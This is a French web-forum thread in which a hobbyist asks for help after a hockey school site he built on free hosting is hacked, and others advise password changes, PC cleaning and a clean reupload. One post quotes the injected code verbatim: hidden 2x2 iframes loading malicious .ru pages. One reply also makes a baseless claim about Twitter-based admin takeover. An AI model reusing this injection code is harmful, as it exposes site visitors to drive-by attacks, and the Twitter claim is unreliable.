Piratage de mon site
Résolu
grominnetto
Messages postés
52
Date d'inscription
Statut
Membre
Dernière intervention
-
grominnetto Messages postés 52 Date d'inscription Statut Membre Dernière intervention -
grominnetto Messages postés 52 Date d'inscription Statut Membre Dernière intervention -
Bonjour,
Je suis un peu confus....Suite à la demande d'un ami, je lui ai fabriqué un petit site web pour son école de hockey: hockeychristianlauzon.hostei.com/ avec dreamweaver sous 000webhost et le transfert via filezilla
Comme il voulait y ajouter des statistiques à chaques semaines, je lui ai laissé tout les coordonnées: mot de passe et tout!!
La semaine dernière, je voulais voir le site car mon neveu y joumaise...Quel Choc!!!
1- Le site a été piraté, il me ramène au moteur de recherche de BING constamment
2- Après quelques recherches, je constate trois javascript qui parlent de Pinkpiller, de Greenpiller et de Orangemoth...tous ont .ru
3- Je constate aussi que le codage en a mangé un coup...je ne suis pas un grand connaisseur...mais il me l'a tout chambardé....faillait s'y attendre!!
Maintenant: après avoir tout enlevé les scripts, l'avoir refait examiné par les outils de Google webmaster, je me demande bien si mon site va ME revenir en bon étât!!
Ma grosse question: Comment faire et Quoi faire pour que cela ne se reproduise pas???
Un Gros merci, car je suis un peu submergé...comme un peu au dessus de mes connaissances...mais je vais en apprendre encore davantage ainsi!!!
Je suis un peu confus....Suite à la demande d'un ami, je lui ai fabriqué un petit site web pour son école de hockey: hockeychristianlauzon.hostei.com/ avec dreamweaver sous 000webhost et le transfert via filezilla
Comme il voulait y ajouter des statistiques à chaques semaines, je lui ai laissé tout les coordonnées: mot de passe et tout!!
La semaine dernière, je voulais voir le site car mon neveu y joumaise...Quel Choc!!!
1- Le site a été piraté, il me ramène au moteur de recherche de BING constamment
2- Après quelques recherches, je constate trois javascript qui parlent de Pinkpiller, de Greenpiller et de Orangemoth...tous ont .ru
3- Je constate aussi que le codage en a mangé un coup...je ne suis pas un grand connaisseur...mais il me l'a tout chambardé....faillait s'y attendre!!
Maintenant: après avoir tout enlevé les scripts, l'avoir refait examiné par les outils de Google webmaster, je me demande bien si mon site va ME revenir en bon étât!!
Ma grosse question: Comment faire et Quoi faire pour que cela ne se reproduise pas???
Un Gros merci, car je suis un peu submergé...comme un peu au dessus de mes connaissances...mais je vais en apprendre encore davantage ainsi!!!
A voir également:
- Piratage de mon site
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site de partage de photos - Guide
- Meilleur site de vente entre particulier - Guide
11 réponses
si tu n'as pas installé de BDD
- changer tous les mots de passe
- désinfecter ton pc
- effacer TOUT ce qui est sur l'hébergeur
- remettre une version saine en ligne
- faire une demande de révision auprès des services de google
... pour commencer ;)
https://longuetraine.fr/index.php?article792/il-est-possible-que-ce-site-ait-ete-pirate-avertissement-google
https://longuetraine.fr/?article373/google-webmaster-tools-outil-pour-les-malwares
https://longuetraine.fr/index.php?article539/page-malveillante-site-bloque-et-sanction-de-google-solutions-pour-les-webmasters
le 'www' est fait aussi pour communiquer, partager et échanger, non ?
merci d'avoir la politesse de répondre à ceux qui essaient de vous aider
- changer tous les mots de passe
- désinfecter ton pc
- effacer TOUT ce qui est sur l'hébergeur
- remettre une version saine en ligne
- faire une demande de révision auprès des services de google
... pour commencer ;)
https://longuetraine.fr/index.php?article792/il-est-possible-que-ce-site-ait-ete-pirate-avertissement-google
https://longuetraine.fr/?article373/google-webmaster-tools-outil-pour-les-malwares
https://longuetraine.fr/index.php?article539/page-malveillante-site-bloque-et-sanction-de-google-solutions-pour-les-webmasters
le 'www' est fait aussi pour communiquer, partager et échanger, non ?
merci d'avoir la politesse de répondre à ceux qui essaient de vous aider
A premiere vue, la seule page dynamique serait la page "contactez-nous", as tu pensé a securiser ton formulaire avant le traitement ?
Greg: Voici les scripts que j'ai trouvé sur chaque page, un par page:
/*c3284d*/
document.write('<iframe src="http://orangemoth.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
/*c3284d*/
document.write('<iframe src="http://pinkpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
/*c3284d*/
document.write('<iframe src="http://greenpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
/*c3284d*/
document.write('<iframe src="http://orangemoth.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
/*c3284d*/
document.write('<iframe src="http://pinkpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
/*c3284d*/
document.write('<iframe src="http://greenpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Graffix: Désolé mais j'ai eu un cours très de base et sécuriser son site ne faisait pas partie de mon cours évidemment. La seule manière que j'ai sécuriser, d'une certaine manière un site, était d'empêcher le copier coller sur un site de lutte (catch)....Autrement, je n'y connais rien....
Si tu as des idées ou des trucs, tout est bienvenus!!!
Merci!!!!
Si tu as des idées ou des trucs, tout est bienvenus!!!
Merci!!!!
Les scripts disent qu'il se sont enregistres par twitter dans le site.
En gros ils ont enregistrés leur IP dans la liste des droits admins!!!
Je ne vois qu'une seule solution:
Empêche tout ce qui vient de l'exterieur et qui est écrit (commentaire le j'aime de facebook, twitter etc...)
TOUT CEUX QUI PASSENT PAR LE LIEN TWITTER SERONT PIRATES!!!
Greg160
En gros ils ont enregistrés leur IP dans la liste des droits admins!!!
Je ne vois qu'une seule solution:
Empêche tout ce qui vient de l'exterieur et qui est écrit (commentaire le j'aime de facebook, twitter etc...)
TOUT CEUX QUI PASSENT PAR LE LIEN TWITTER SERONT PIRATES!!!
Greg160
Je dois attendre si les gens sont prêts à payer pour le refaire!
mais....
Comment fait-on pour empêcher les gens de l'extérieur?
et
Si je prend tout les fichiers html que j'ai et que je les remets en circulation, est-ce la bonne solution? Sont-ils quand même infectés?
Merci
mais....
Comment fait-on pour empêcher les gens de l'extérieur?
et
Si je prend tout les fichiers html que j'ai et que je les remets en circulation, est-ce la bonne solution? Sont-ils quand même infectés?
Merci
Pendant que j'attends la réponse de l'école de hockey (de ce site), je me demande si j'ai bien compris:
1- Je dois changer le mot de passe sur 00webhost pour connecter filezilla? FAIT
2- Le gestionnaire du site doit désinfecter son ordi? si je peux lui parler, cela risque de ce faire
3- Je peux reprendre toutes les données à partir de filezilla et les transférer sur MON ordi? FAIT
4- Je dois installer un antivirus sur mon serveur...ex: Webdefender....je vais chercher
5- Dois-je protéger mon (et mes sites) davantage pour empêcher quelconques infiltrations?
Merci bien de m'aider...cela me permet d'apprendre énormément!!!!
1- Je dois changer le mot de passe sur 00webhost pour connecter filezilla? FAIT
2- Le gestionnaire du site doit désinfecter son ordi? si je peux lui parler, cela risque de ce faire
3- Je peux reprendre toutes les données à partir de filezilla et les transférer sur MON ordi? FAIT
4- Je dois installer un antivirus sur mon serveur...ex: Webdefender....je vais chercher
5- Dois-je protéger mon (et mes sites) davantage pour empêcher quelconques infiltrations?
Merci bien de m'aider...cela me permet d'apprendre énormément!!!!
1- Je dois changer le mot de passe sur 00webhost pour connecter filezilla? FAIT 2- Le gestionnaire du site doit désinfecter son ordi? si je peux lui parler, cela risque de ce faire 3- Je peux reprendre toutes les données à partir de filezilla et les transférer sur MON ordi? FAIT 4- Je dois installer un antivirus sur mon serveur...ex: Webdefender....je vais chercher 5- Dois-je protéger mon (et mes sites) davantage pour empêcher quelconques infiltrations?
2 : à faire et lui demander de désinfecter aussi sonpc !
3 : scanner le tout à la recherche de ....
4 - ça n'existe pas !!! tu peux faire des tests en ligne, ou QUAND TOUT SERA SUR ET CERTAIN OK installer crawlprotect
antivirus et antimalware fonctionnent sur le pc pas sur le site ;)
SCANNER: désolé, mais ce programme fait quoi au juste? Je l'ai téléchargé et j'ai scanné...et je n'ai pas saisi le but....désolé
CRAWLPROTECT: semble très intéressant, mais il semble que je doive avoir une base de données et avec sql....je n'ai pas de base de données.....mais je prend note du programme.
Merci de ton aide...et de tes idées
CRAWLPROTECT: semble très intéressant, mais il semble que je doive avoir une base de données et avec sql....je n'ai pas de base de données.....mais je prend note du programme.
Merci de ton aide...et de tes idées
Je confirme: définitivement résolu...tout fonctionne!!! un peu grâce à vous!!!
Merci de votre aide!!!
Merci de votre aide!!!
Premièrement il te faut absolument changer tes mots de passe FTP.
Ensuite je te conseil de passer ton ordi avec un antivirus, certains virus envoient les accès FTP au hacker.
Installe un antivirus sur ton serveur, comme webdefender, il te préviendra dès qu'une activité suspect sera détectée.
Bon courage.
Ensuite je te conseil de passer ton ordi avec un antivirus, certains virus envoient les accès FTP au hacker.
Installe un antivirus sur ton serveur, comme webdefender, il te préviendra dès qu'une activité suspect sera détectée.
Bon courage.